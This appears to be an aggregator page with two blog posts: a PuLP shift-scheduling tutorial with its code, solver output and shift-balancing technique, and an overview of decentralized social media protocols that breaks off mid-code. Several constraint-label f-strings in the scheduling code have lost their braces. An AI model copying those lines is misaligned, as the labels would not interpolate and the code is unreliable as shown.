           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED'},
          'THURSDAY - SAWING 2:00 PM - 9:00 PM': {
           'ALICE': 'PREFERRED',
           'BOB':   'PREFERRED',
           'CAROL': 'DISFAVORED',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'JUDY':  'DISFAVORED',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED'},
          'FRIDAY - SAWING 2:00 PM - 9:00 PM': {
           'ALICE': 'PREFERRED',
           'BOB':   'PREFERRED',
           'CAROL': 'DISFAVORED',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'HEIDI': 'REFUSED',
           'JUDY':  'REFUSED',
           'DAVID': 'REFUSED'},
          'SATURDAY - SAWING 2:00 PM - 9:00 PM': {
           'ALICE': 'PREFERRED',
           'BOB':   'PREFERRED',
           'CAROL': 'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'JUDY':  'DISFAVORED',
           'EVE':   'REFUSED',
           'HEIDI': 'REFUSED',
           'GRACE': 'REFUSED',
           'DAVID': 'REFUSED'},
          'SUNDAY - PAINTING 12:15 PM - 7:15 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'PREFERRED',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'HEIDI': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'JUDY':  'NEUTRAL',
           'DAVID': 'REFUSED'},
          'MONDAY - PAINTING 2:00 PM - 9:00 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'DISFAVORED',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'HEIDI': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'JUDY':  'DISFAVORED',
           'DAVID': 'REFUSED'},
          'TUESDAY - PAINTING 2:00 PM - 9:00 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'DISFAVORED',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'HEIDI': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'JUDY':  'REFUSED',
           'DAVID': 'REFUSED'},
          'WEDNESDAY - PAINTING 2:00 PM - 9:00 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'HEIDI': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'JUDY':  'DISFAVORED',
           'EVE':   'REFUSED',
           'DAVID': 'REFUSED'},
          'THURSDAY - PAINTING 2:00 PM - 9:00 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'DISFAVORED',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'HEIDI': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'JUDY':  'DISFAVORED',
           'DAVID': 'REFUSED'},
          'FRIDAY - PAINTING 2:00 PM - 9:00 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'DISFAVORED',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'HEIDI': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'JUDY':  'REFUSED',
           'DAVID': 'REFUSED'},
          'SATURDAY - PAINTING 2:00 PM - 9:00 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'HEIDI': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'JUDY':  'DISFAVORED',
           'EVE':   'REFUSED',
           'GRACE': 'REFUSED',
           'DAVID': 'REFUSED'}}
availabilities = ['PREFERRED', 'NEUTRAL', 'DISFAVORED']
import pulp
prob = pulp.LpProblem("Scheduling", pulp.LpMaximize)
vars = pulp.LpVariable.dicts("Assignments",
                             (humans, shifts.keys()),
                             None,None, # bounds; unused, since these are binary variables
                             pulp.LpBinary)
# Everyone works at least 2 shifts
Nshifts_min = 2
for h in humans:
    prob += (
        pulp.lpSum([vars[h][s] for s in shifts.keys()]) >= Nshifts_min,
        f" h  works at least  Nshifts_min  shifts",
    )
# each shift is ~ 8 hours, so I limit everyone to 40/8 = 5 shifts
Nshifts_max = 5
for h in humans:
    prob += (
        pulp.lpSum([vars[h][s] for s in shifts.keys()]) <= Nshifts_max,
        f" h  works at most  Nshifts_max  shifts",
    )
# all shifts staffed and not double-staffed
for s in shifts.keys():
    prob += (
        pulp.lpSum([vars[h][s] for h in humans]) == 1,
        f" s  is staffed",
    )
# each human can work at most one shift on any given day
for w in days_of_week:
    for h in humans:
        prob += (
            pulp.lpSum([vars[h][s] for s in shifts.keys() if re.match(rf'{w} ',s)]) <= 1,
            f"{h} cannot be double-booked on {w}"
        )
#### Some explicit constraints; as an example
# DAVID can't work any PAINTING shift and is off on Thu and Sun
h = 'DAVID'
prob += (
    pulp.lpSum([vars[h][s] for s in shifts.keys() if re.search(r'- PAINTING',s)]) == 0,
    f" h  can't work any PAINTING shift"
)
prob += (
    pulp.lpSum([vars[h][s] for s in shifts.keys() if re.match(r'THURSDAY|SUNDAY',s)]) == 0,
    f"{h} is off on Thursday and Sunday"
)
# Do not assign any "REFUSED" shifts
for s in shifts.keys():
    for h in humans:
        if shifts[s][h] == 'REFUSED':
            prob += (
                vars[h][s] == 0,
                f" h  is not available for  s "
            )
# Objective. I try to maximize the "happiness". Each human sees each shift as
# one of:
#
#   PREFERRED
#   NEUTRAL
#   DISFAVORED
#   REFUSED
#
# I set a hard constraint to handle "REFUSED", and arbitrarily, I set these
# benefit values for the others
benefit_availability = dict()
benefit_availability['PREFERRED']  = 3
benefit_availability['NEUTRAL']    = 2
benefit_availability['DISFAVORED'] = 1
# Not used, since this is a hard constraint. But the code needs this to be a
# part of the benefit. I can ignore these in the code, but let's keep this
# simple
benefit_availability['REFUSED' ] = -1000
benefits = dict()
for h in humans:
    benefits[h] = \
        pulp.lpSum([vars[h][s] * benefit_availability[shifts[s][h]] \
                    for s in shifts.keys()])
benefit_total = \
    pulp.lpSum([benefits[h] \
                for h in humans])
prob += (
    benefit_total,
    "happiness",
)
prob.solve()
if pulp.LpStatus[prob.status] == "Optimal":
    report_solution_to_console(vars)
    report_solution_summary_to_console(vars)
The set of workers is in the humans variable, and the shift schedule and the workers' preferences are encoded in the shifts dict. The problem is defined by a vars dict of dicts, each a boolean variable indicating whether a particular worker is scheduled for a particular shift. We define a set of constraints on these worker allocations to restrict ourselves to valid solutions. And among these valid solutions, we try to find the one that maximizes some benefit function, defined here as:
benefit_availability = dict()
benefit_availability['PREFERRED']  = 3
benefit_availability['NEUTRAL']    = 2
benefit_availability['DISFAVORED'] = 1
benefits = dict()
for h in humans:
    benefits[h] = \
        pulp.lpSum([vars[h][s] * benefit_availability[shifts[s][h]] \
                    for s in shifts.keys()])
benefit_total = \
    pulp.lpSum([benefits[h] \
                for h in humans])
So for instance each shift that was scheduled as somebody's PREFERRED shift gives us 3 benefit points. And if all the shifts ended up being PREFERRED, we'd have a total benefit value of 3*Nshifts. This is impossible, however, because that would violate some constraints in the problem. The exact trade-off between the different preferences is set in the benefit_availability dict. With the above numbers, it's equally good for somebody to have a NEUTRAL shift and a day off as it is for them to have two DISFAVORED shifts: 2 + 0 benefit points in the first case, 1 + 1 in the second. If we really want to encourage the program to work people as much as possible (days off discouraged), we'd want to raise the DISFAVORED value. I run this program and I get:
....
Result - Optimal solution found
Objective value:                108.00000000
Enumerated nodes:               0
Total iterations:               0
Time (CPU seconds):             0.01
Time (Wallclock seconds):       0.01
Option for printingOptions changed from normal to all
Total time (CPU seconds):       0.02   (Wallclock seconds):       0.02
SUNDAY
    ---- SANDING 9:00 AM - 4:00 PM
         EVE (PREFERRED)
    ---- SAWING 9:00 AM - 4:00 PM
         IVAN (PREFERRED)
    ---- PAINTING 9:45 AM - 4:45 PM
         FRANK (PREFERRED)
    ---- PAINTING 11:00 AM - 6:00 PM
         HEIDI (PREFERRED)
    ---- SAWING 12:00 PM - 7:00 PM
         ALICE (PREFERRED)
    ---- PAINTING 12:15 PM - 7:15 PM
         CAROL (PREFERRED)
MONDAY
    ---- SAWING 9:00 AM - 4:00 PM
         DAVID (PREFERRED)
    ---- PAINTING 9:45 AM - 4:45 PM
         IVAN (PREFERRED)
    ---- PAINTING 12:00 PM - 7:00 PM
         GRACE (PREFERRED)
    ---- SAWING 2:00 PM - 9:00 PM
         ALICE (PREFERRED)
    ---- PAINTING 2:00 PM - 9:00 PM
         HEIDI (NEUTRAL)
TUESDAY
    ---- SAWING 9:00 AM - 4:00 PM
         DAVID (PREFERRED)
    ---- PAINTING 9:45 AM - 4:45 PM
         EVE (PREFERRED)
    ---- PAINTING 12:00 PM - 7:00 PM
         FRANK (NEUTRAL)
    ---- SAWING 2:00 PM - 9:00 PM
         BOB (PREFERRED)
    ---- PAINTING 2:00 PM - 9:00 PM
         HEIDI (NEUTRAL)
WEDNESDAY
    ---- SAWING 7:30 AM - 2:30 PM
         DAVID (PREFERRED)
    ---- PAINTING 7:30 AM - 2:30 PM
         IVAN (PREFERRED)
    ---- SANDING 9:45 AM - 4:45 PM
         FRANK (PREFERRED)
    ---- PAINTING 12:00 PM - 7:00 PM
         JUDY (PREFERRED)
    ---- SAWING 2:00 PM - 9:00 PM
         BOB (PREFERRED)
    ---- PAINTING 2:00 PM - 9:00 PM
         ALICE (NEUTRAL)
THURSDAY
    ---- SANDING 9:00 AM - 4:00 PM
         GRACE (PREFERRED)
    ---- SAWING 9:00 AM - 4:00 PM
         CAROL (PREFERRED)
    ---- PAINTING 9:45 AM - 4:45 PM
         EVE (PREFERRED)
    ---- PAINTING 12:00 PM - 7:00 PM
         JUDY (PREFERRED)
    ---- SAWING 2:00 PM - 9:00 PM
         BOB (PREFERRED)
    ---- PAINTING 2:00 PM - 9:00 PM
         ALICE (NEUTRAL)
FRIDAY
    ---- SAWING 9:00 AM - 4:00 PM
         DAVID (PREFERRED)
    ---- PAINTING 9:45 AM - 4:45 PM
         FRANK (PREFERRED)
    ---- PAINTING 12:00 PM - 7:00 PM
         GRACE (NEUTRAL)
    ---- SAWING 2:00 PM - 9:00 PM
         BOB (PREFERRED)
    ---- PAINTING 2:00 PM - 9:00 PM
         HEIDI (NEUTRAL)
SATURDAY
    ---- SAWING 7:30 AM - 2:30 PM
         CAROL (PREFERRED)
    ---- PAINTING 7:30 AM - 2:30 PM
         IVAN (PREFERRED)
    ---- SANDING 9:45 AM - 4:45 PM
         DAVID (PREFERRED)
    ---- PAINTING 12:00 PM - 7:00 PM
         FRANK (NEUTRAL)
    ---- SAWING 2:00 PM - 9:00 PM
         ALICE (PREFERRED)
    ---- PAINTING 2:00 PM - 9:00 PM
         BOB (NEUTRAL)
SUMMARY
-- ALICE
   benefit: 13.000
   3 PREFERRED
   2 NEUTRAL
   0 DISFAVORED
-- BOB
   benefit: 14.000
   4 PREFERRED
   1 NEUTRAL
   0 DISFAVORED
-- CAROL
   benefit: 9.000
   3 PREFERRED
   0 NEUTRAL
   0 DISFAVORED
-- DAVID
   benefit: 15.000
   5 PREFERRED
   0 NEUTRAL
   0 DISFAVORED
-- EVE
   benefit: 9.000
   3 PREFERRED
   0 NEUTRAL
   0 DISFAVORED
-- FRANK
   benefit: 13.000
   3 PREFERRED
   2 NEUTRAL
   0 DISFAVORED
-- GRACE
   benefit: 8.000
   2 PREFERRED
   1 NEUTRAL
   0 DISFAVORED
-- HEIDI
   benefit: 9.000
   1 PREFERRED
   3 NEUTRAL
   0 DISFAVORED
-- IVAN
   benefit: 12.000
   4 PREFERRED
   0 NEUTRAL
   0 DISFAVORED
-- JUDY
   benefit: 6.000
   2 PREFERRED
   0 NEUTRAL
   0 DISFAVORED
So we have a solution! We have 108 total benefit points. But it looks a bit uneven: Judy only works 2 days, while some people work many more: David works 5, for instance. Why is that? I update the program with human_annotate = 'JUDY', run it again, and it tells me more about Judy's preferences:
Objective value:                108.00000000
Enumerated nodes:               0
Total iterations:               0
Time (CPU seconds):             0.01
Time (Wallclock seconds):       0.01
Option for printingOptions changed from normal to all
Total time (CPU seconds):       0.01   (Wallclock seconds):       0.02
SUNDAY (JUDY OFF)
    ---- SANDING 9:00 AM - 4:00 PM (JUDY NEUTRAL)
         EVE (PREFERRED)
    ---- SAWING 9:00 AM - 4:00 PM (JUDY PREFERRED)
         IVAN (PREFERRED)
    ---- PAINTING 9:45 AM - 4:45 PM (JUDY PREFERRED)
         FRANK (PREFERRED)
    ---- PAINTING 11:00 AM - 6:00 PM (JUDY NEUTRAL)
         HEIDI (PREFERRED)
    ---- SAWING 12:00 PM - 7:00 PM (JUDY PREFERRED)
         ALICE (PREFERRED)
    ---- PAINTING 12:15 PM - 7:15 PM (JUDY NEUTRAL)
         CAROL (PREFERRED)
MONDAY (JUDY OFF)
    ---- SAWING 9:00 AM - 4:00 PM (JUDY PREFERRED)
         DAVID (PREFERRED)
    ---- PAINTING 9:45 AM - 4:45 PM (JUDY NEUTRAL)
         IVAN (PREFERRED)
    ---- PAINTING 12:00 PM - 7:00 PM (JUDY NEUTRAL)
         GRACE (PREFERRED)
    ---- SAWING 2:00 PM - 9:00 PM (JUDY DISFAVORED)
         ALICE (PREFERRED)
    ---- PAINTING 2:00 PM - 9:00 PM (JUDY DISFAVORED)
         HEIDI (NEUTRAL)
TUESDAY (JUDY OFF)
    ---- SAWING 9:00 AM - 4:00 PM (JUDY PREFERRED)
         DAVID (PREFERRED)
    ---- PAINTING 9:45 AM - 4:45 PM (JUDY PREFERRED)
         EVE (PREFERRED)
    ---- PAINTING 12:00 PM - 7:00 PM (JUDY REFUSED)
         FRANK (NEUTRAL)
    ---- SAWING 2:00 PM - 9:00 PM (JUDY REFUSED)
         BOB (PREFERRED)
    ---- PAINTING 2:00 PM - 9:00 PM (JUDY REFUSED)
         HEIDI (NEUTRAL)
WEDNESDAY (JUDY SCHEDULED)
    ---- SAWING 7:30 AM - 2:30 PM (JUDY REFUSED)
         DAVID (PREFERRED)
    ---- PAINTING 7:30 AM - 2:30 PM (JUDY REFUSED)
         IVAN (PREFERRED)
    ---- SANDING 9:45 AM - 4:45 PM (JUDY NEUTRAL)
         FRANK (PREFERRED)
    ---- PAINTING 12:00 PM - 7:00 PM (JUDY PREFERRED)
         JUDY (PREFERRED)
    ---- SAWING 2:00 PM - 9:00 PM (JUDY DISFAVORED)
         BOB (PREFERRED)
    ---- PAINTING 2:00 PM - 9:00 PM (JUDY DISFAVORED)
         ALICE (NEUTRAL)
THURSDAY (JUDY SCHEDULED)
    ---- SANDING 9:00 AM - 4:00 PM (JUDY PREFERRED)
         GRACE (PREFERRED)
    ---- SAWING 9:00 AM - 4:00 PM (JUDY PREFERRED)
         CAROL (PREFERRED)
    ---- PAINTING 9:45 AM - 4:45 PM (JUDY PREFERRED)
         EVE (PREFERRED)
    ---- PAINTING 12:00 PM - 7:00 PM (JUDY PREFERRED)
         JUDY (PREFERRED)
    ---- SAWING 2:00 PM - 9:00 PM (JUDY DISFAVORED)
         BOB (PREFERRED)
    ---- PAINTING 2:00 PM - 9:00 PM (JUDY DISFAVORED)
         ALICE (NEUTRAL)
FRIDAY (JUDY OFF)
    ---- SAWING 9:00 AM - 4:00 PM (JUDY DISFAVORED)
         DAVID (PREFERRED)
    ---- PAINTING 9:45 AM - 4:45 PM (JUDY DISFAVORED)
         FRANK (PREFERRED)
    ---- PAINTING 12:00 PM - 7:00 PM (JUDY DISFAVORED)
         GRACE (NEUTRAL)
    ---- SAWING 2:00 PM - 9:00 PM (JUDY REFUSED)
         BOB (PREFERRED)
    ---- PAINTING 2:00 PM - 9:00 PM (JUDY REFUSED)
         HEIDI (NEUTRAL)
SATURDAY (JUDY OFF)
    ---- SAWING 7:30 AM - 2:30 PM (JUDY REFUSED)
         CAROL (PREFERRED)
    ---- PAINTING 7:30 AM - 2:30 PM (JUDY REFUSED)
         IVAN (PREFERRED)
    ---- SANDING 9:45 AM - 4:45 PM (JUDY REFUSED)
         DAVID (PREFERRED)
    ---- PAINTING 12:00 PM - 7:00 PM (JUDY DISFAVORED)
         FRANK (NEUTRAL)
    ---- SAWING 2:00 PM - 9:00 PM (JUDY DISFAVORED)
         ALICE (PREFERRED)
    ---- PAINTING 2:00 PM - 9:00 PM (JUDY DISFAVORED)
         BOB (NEUTRAL)
SUMMARY
-- ALICE
   benefit: 13.000
   3 PREFERRED
   2 NEUTRAL
   0 DISFAVORED
-- BOB
   benefit: 14.000
   4 PREFERRED
   1 NEUTRAL
   0 DISFAVORED
-- CAROL
   benefit: 9.000
   3 PREFERRED
   0 NEUTRAL
   0 DISFAVORED
-- DAVID
   benefit: 15.000
   5 PREFERRED
   0 NEUTRAL
   0 DISFAVORED
-- EVE
   benefit: 9.000
   3 PREFERRED
   0 NEUTRAL
   0 DISFAVORED
-- FRANK
   benefit: 13.000
   3 PREFERRED
   2 NEUTRAL
   0 DISFAVORED
-- GRACE
   benefit: 8.000
   2 PREFERRED
   1 NEUTRAL
   0 DISFAVORED
-- HEIDI
   benefit: 9.000
   1 PREFERRED
   3 NEUTRAL
   0 DISFAVORED
-- IVAN
   benefit: 12.000
   4 PREFERRED
   0 NEUTRAL
   0 DISFAVORED
-- JUDY
   benefit: 6.000
   2 PREFERRED
   0 NEUTRAL
   0 DISFAVORED
This tells us that on Monday Judy does not work, although she marked the SAWING shift as PREFERRED. Instead David got that shift. What would happen if David gave that shift to Judy? He would lose 3 points, she would gain 3 points, and the total would remain exactly the same at 108. How would we favor a more even distribution? We need some sort of tie-break. I want to add a nonlinearity to strongly disfavor people getting a low number of shifts. But PuLP is very explicitly a linear programming solver, and cannot solve nonlinear problems. Here we can get around this by enumerating each specific case, and assigning it a nonlinear benefit function. The most obvious approach is to define another set of boolean variables: vars_Nshifts[human][N]. And then use them to add extra benefit terms, with values nonlinearly related to Nshifts. Something like this:
benefit_boost_Nshifts = \
    { 2: -0.8,
      3: -0.5,
      4: -0.3,
      5: -0.2 }
for h in humans:
    benefits[h] = \
        ... + \
        pulp.lpSum([vars_Nshifts[h][n] * benefit_boost_Nshifts[n] \
                    for n in benefit_boost_Nshifts.keys()])
So in the previous example we considered giving David's 5th shift to Judy, for her 3rd shift. In that scenario, David's extra benefit would change from -0.2 to -0.3 (a shift of -0.1), while Judy's would change from -0.8 to -0.5 (a shift of +0.3). So balancing out the shifts in this way would work: the solver would favor the solution with the higher benefit function. Great. In order for this to work, we need the vars_Nshifts[human][N] variables to function as intended: they need to be binary indicators of whether a specific person has that many shifts or not. That would need to be implemented with constraints. Let's plot it like this:
#!/usr/bin/python3
import numpy as np
import gnuplotlib as gp
Nshifts_eq  = 4
Nshifts_max = 10
Nshifts = np.arange(Nshifts_max+1)
i0 = np.nonzero(Nshifts != Nshifts_eq)[0]
i1 = np.nonzero(Nshifts == Nshifts_eq)[0]
gp.plot( # True value: var_Nshifts4==0, Nshifts!=4
         ( np.zeros(i0.shape),
           Nshifts[i0],
           dict(_with     = 'points pt 7 ps 1 lc "red"') ),
         # True value: var_Nshifts4==1, Nshifts==4
         ( np.ones(i1.shape),
           Nshifts[i1],
           dict(_with     = 'points pt 7 ps 1 lc "red"') ),
         # False value: var_Nshifts4==1, Nshifts!=4
         ( np.ones(i0.shape),
           Nshifts[i0],
           dict(_with     = 'points pt 7 ps 1 lc "black"') ),
         # False value: var_Nshifts4==0, Nshifts==4
         ( np.zeros(i1.shape),
           Nshifts[i1],
           dict(_with     = 'points pt 7 ps 1 lc "black"') ),
        unset=('grid'),
        _set = (f'xtics ("(Nshifts=={Nshifts_eq}) == 0" 0, "(Nshifts=={Nshifts_eq}) == 1" 1)'),
        _xrange = (-0.1, 1.1),
        ylabel = "Nshifts",
        title = "Nshifts equality variable: not linearly separable",
        hardcopy = "/tmp/scheduling-Nshifts-eq.svg")
[Figure: scheduling-Nshifts-eq.svg]
So a hypothetical vars_Nshifts[h][4] variable (plotted on the x axis of this plot) would need to be defined by a set of linear AND constraints to linearly separate the true (red) values of this variable from the false (black) values. As can be seen in this plot, this isn't possible. So this representation does not work. How do we fix it? We can use inequality variables instead. I define a different set of variables vars_Nshifts_leq[human][N] that are 1 iff Nshifts <= N. The equality variable from before can be expressed as a difference of these inequality variables: vars_Nshifts[human][N] = vars_Nshifts_leq[human][N]-vars_Nshifts_leq[human][N-1] Can these vars_Nshifts_leq variables be defined by a set of linear AND constraints? Yes:
#!/usr/bin/python3
import numpy as np
import numpysane as nps
import gnuplotlib as gp
Nshifts_leq = 4
Nshifts_max = 10
Nshifts = np.arange(Nshifts_max+1)
i0 = np.nonzero(Nshifts >  Nshifts_leq)[0]
i1 = np.nonzero(Nshifts <= Nshifts_leq)[0]
def linear_slope_yintercept(xy0,xy1):
    m = (xy1[1] - xy0[1])/(xy1[0] - xy0[0])
    b = xy1[1] - m * xy1[0]
    return np.array(( m, b ))
x01     = np.arange(2)
x01_one = nps.glue( nps.transpose(x01), np.ones((2,1)), axis=-1)
y_lowerbound = nps.inner(x01_one,
                         linear_slope_yintercept( np.array((0, Nshifts_leq+1)),
                                                  np.array((1, 0)) ))
y_upperbound = nps.inner(x01_one,
                         linear_slope_yintercept( np.array((0, Nshifts_max)),
                                                  np.array((1, Nshifts_leq)) ))
y_lowerbound_check = (1-x01) * (Nshifts_leq+1)
y_upperbound_check = Nshifts_max - x01*(Nshifts_max-Nshifts_leq)
gp.plot( # True value: var_Nshifts_leq4==0, Nshifts>4
         ( np.zeros(i0.shape),
           Nshifts[i0],
           dict(_with     = 'points pt 7 ps 1 lc "red"') ),
         # True value: var_Nshifts_leq4==1, Nshifts<=4
         ( np.ones(i1.shape),
           Nshifts[i1],
           dict(_with     = 'points pt 7 ps 1 lc "red"') ),
         # False value: var_Nshifts_leq4==1, Nshifts>4
         ( np.ones(i0.shape),
           Nshifts[i0],
           dict(_with     = 'points pt 7 ps 1 lc "black"') ),
         # False value: var_Nshifts_leq4==0, Nshifts<=4
         ( np.zeros(i1.shape),
           Nshifts[i1],
           dict(_with     = 'points pt 7 ps 1 lc "black"') ),
         ( x01, y_lowerbound, y_upperbound,
           dict( _with     = 'filledcurves lc "green"',
                 tuplesize = 3) ),
         ( x01, nps.cat(y_lowerbound_check, y_upperbound_check),
           dict( _with     = 'lines lc "green" lw 2',
                 tuplesize = 2) ),
        unset=('grid'),
        _set = (f'xtics ("(Nshifts<={Nshifts_leq}) == 0" 0, "(Nshifts<={Nshifts_leq}) == 1" 1)',
                'style fill transparent pattern 1'),
        _xrange = (-0.1, 1.1),
        ylabel = "Nshifts",
        title = "Nshifts inequality variable: linearly separable",
        hardcopy = "/tmp/scheduling-Nshifts-leq.svg")
[Figure: scheduling-Nshifts-leq.svg]
So we can use two linear constraints to make each of these variables work properly. To use these in the benefit function we can use the equality constraint expression from above, or we can use these directly:
# I want to favor people getting more extra shifts at the start to balance
# things out: somebody getting one more shift on their pile shouldn't take
# shifts away from under-utilized people
benefit_boost_leq_bound = \
    { 2: .2,
      3: .3,
      4: .4,
      5: .5 }
# Constrain vars_Nshifts_leq variables to do the right thing
for h in humans:
    for b in benefit_boost_leq_bound.keys():
        prob += (pulp.lpSum([vars[h][s] for s in shifts.keys()])
                 >= (1 - vars_Nshifts_leq[h][b])*(b+1),
                 f" h  at least  b  shifts: lower bound")
        prob += (pulp.lpSum([vars[h][s] for s in shifts.keys()])
                 <= Nshifts_max - vars_Nshifts_leq[h][b]*(Nshifts_max-b),
                 f" h  at least  b  shifts: upper bound")
benefits = dict()
for h in humans:
    benefits[h] = \
        ... + \
        pulp.lpSum([vars_Nshifts_leq[h][b] * benefit_boost_leq_bound[b] \
                    for b in benefit_boost_leq_bound.keys()])
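One piece this excerpt doesn't show is the declaration of the vars_Nshifts_leq variables themselves. A minimal sketch of what it could look like, assuming the same conventions as the "Assignments" declaration earlier (the full program linked below may do this differently):

# Hypothetical declaration: one binary indicator per human per bound
vars_Nshifts_leq = pulp.LpVariable.dicts("Nshifts_leq",
                                         (humans, list(benefit_boost_leq_bound.keys())),
                                         None, None, # bounds; unused for binary variables
                                         pulp.LpBinary)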
In this scenario, David would get a boost of 0.4 from giving up his 5th shift, while Judy would lose a boost of 0.2 from getting her 3rd, for a net gain of 0.2 benefit points. The exact numbers will need to be adjusted on a case-by-case basis, but this works. The full program, with this and other extra features, is available here.

Otto Kekäläinen: Will decentralized social media soon go mainstream?

In today's digital landscape, social media is more than just a communication tool: it is the primary medium for global discourse. Heads of state, corporate leaders and cultural influencers now broadcast their statements directly to the world, shaping public opinion in real time. However, the dominance of a few centralized platforms (X/Twitter, Facebook and YouTube) raises critical concerns about control, censorship and the monopolization of information. Those who control these networks effectively wield significant power over public discourse. In response, a new wave of distributed social media platforms has emerged, each built on different decentralized protocols designed to provide greater autonomy, censorship resistance and user control. While Wikipedia maintains a comprehensive list of distributed social networking software and protocols, it does not cover recent blockchain-based systems, nor does it highlight which have the most potential for mainstream adoption. This post explores the leading decentralized social media platforms and the protocols they are based on: Mastodon (ActivityPub), Bluesky (AT Protocol), Warpcast (Farcaster), Hey (Lens) and Primal (Nostr).

Comparison of architecture and mainstream adoption potential
Protocol  | Identity System       | Example                | Storage model          | Cost for end users           | Potential
Mastodon  | Tied to server domain | @ottok@mastodon.social | Federated instances    | Free (some instances charge) | High
Bluesky   | Portable (DID)        | ottoke.bsky.social     | Federated instances    | Free                         | Moderate
Farcaster | ENS (Ethereum)        | @ottok                 | Blockchain + off-chain | Small gas fees               | Moderate
Lens      | NFT-based (Polygon)   | @ottok                 | Blockchain + off-chain | Small gas fees               | Niche
Nostr     | Cryptographic keys    | npub16lc6uhqpg6dnqajylkhwuh3j7ynhcnje508tt4v6703w9kjlv9vqzz4z7f | Federated instances | Free (some instances charge) | Niche

1. Mastodon (ActivityPub) Mastodon was created in 2016 by Eugen Rochko, a German software developer who sought to provide a decentralized and user-controlled alternative to Twitter. It was built on the ActivityPub protocol, now standardized by the W3C Social Web Working Group, to allow users to join independent servers while still communicating across the broader Mastodon network. Mastodon operates on a federated model, where multiple independently run servers communicate via ActivityPub. Each server sets its own moderation policies, leading to a decentralized but fragmented experience. The servers can alternatively be called instances, relays or nodes, depending on what vocabulary a protocol has standardized on.
  • Identity: User identity is tied to the instance where they registered, represented as @username@instance.tld.
  • Storage: Data is stored on individual instances, which federate messages to other instances based on their configurations.
  • Cost: Free to use, but relies on instance operators willing to run the servers.
The protocol defines multiple activities such as:
  • Creating a post
  • Liking
  • Sharing
  • Following
  • Commenting

Example Message in ActivityPub (JSON-LD Format)
{
  "@context": "https://www.w3.org/ns/activitystreams",
  "type": "Create",
  "actor": "https://mastodon.social/users/ottok",
  "object": {
    "type": "Note",
    "content": "Hello from #Mastodon!",
    "published": "2025-03-03T12:00:00Z",
    "to": ["https://www.w3.org/ns/activitystreams#Public"]
  }
}
Servers communicate across different platforms by publishing activities to their followers or forwarding activities between servers. Standard HTTPS is used between servers for communication, and the messages use JSON-LD for data representation. The WebFinger protocol is used for user discovery. There is, however, no neat way for home server discovery yet. This means that if you are browsing e.g. Fosstodon and want to follow a user and press Follow, a dialog will pop up asking you to enter your own home server (e.g. mastodon.social) to redirect you there for actually executing the Follow action with your account. Mastodon is open source under the AGPL at github.com/mastodon/mastodon. Anyone can operate their own instance. It just requires running your own server, some skills to maintain a Ruby on Rails app with a PostgreSQL database backend, and a basic understanding of the protocol to configure federation with other ActivityPub instances.
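As an illustration of the discovery step, this is roughly what a WebFinger lookup looks like from Python; the account queried here is the example identity from the table above, and the exact shape of the response is instance-dependent:

import json
import urllib.request

# RFC 7033 WebFinger lookup for an example account
url = ('https://mastodon.social/.well-known/webfinger'
       '?resource=acct:ottok@mastodon.social')
with urllib.request.urlopen(url) as response:
    doc = json.load(response)
# The rel="self" link points at the user's ActivityPub actor document
print([l for l in doc['links'] if l.get('rel') == 'self'])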

Popularity: Already established, but will it grow more? Mastodon has seen steady growth, especially after Twitter's acquisition in 2022, with some estimates stating it peaked at 10 million users across thousands of instances. However, its fragmented user experience and the complexity of choosing instances have hindered mainstream adoption. Still, it remains the most established decentralized alternative to Twitter. Note that Donald Trump's Truth Social is based on the Mastodon software but does not federate with the ActivityPub network. The ActivityPub protocol is the most widely used of its kind. One of the other most popular services is the Lemmy link-sharing service, similar to Reddit. The larger ecosystem of ActivityPub is called the Fediverse, and estimates put the total active user count around 6 million.

2. Bluesky (AT Protocol) Interestingly, Bluesky was conceived within Twitter in 2019 by Twitter founder Jack Dorsey. After being incubated as a Twitter-funded project, it spun off as an independent Public Benefit LLC in February 2022 and launched its public beta in February 2023. Bluesky runs on top of the Authenticated Transfer (AT) Protocol published at https://github.com/bluesky-social/atproto. The protocol enables portable identities and data ownership, meaning users can migrate between platforms while keeping their identity and content intact. In practice, however, there is only one popular server at the moment, which is Bluesky itself.
  • Identity: Usernames are domain-based (e.g., @user.bsky.social).
  • Storage: Content is theoretically federated among various servers.
  • Cost: Free to use, but relies on instance operators willing to run the servers.
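To make the portable identity idea concrete, a handle can be resolved to its underlying DID with a single XRPC call. A minimal sketch in Python, using the example handle from the table above (treat the response shown as illustrative):

import json
import urllib.request

# Resolve a handle to its DID via the com.atproto.identity.resolveHandle endpoint
url = ('https://bsky.social/xrpc/com.atproto.identity.resolveHandle'
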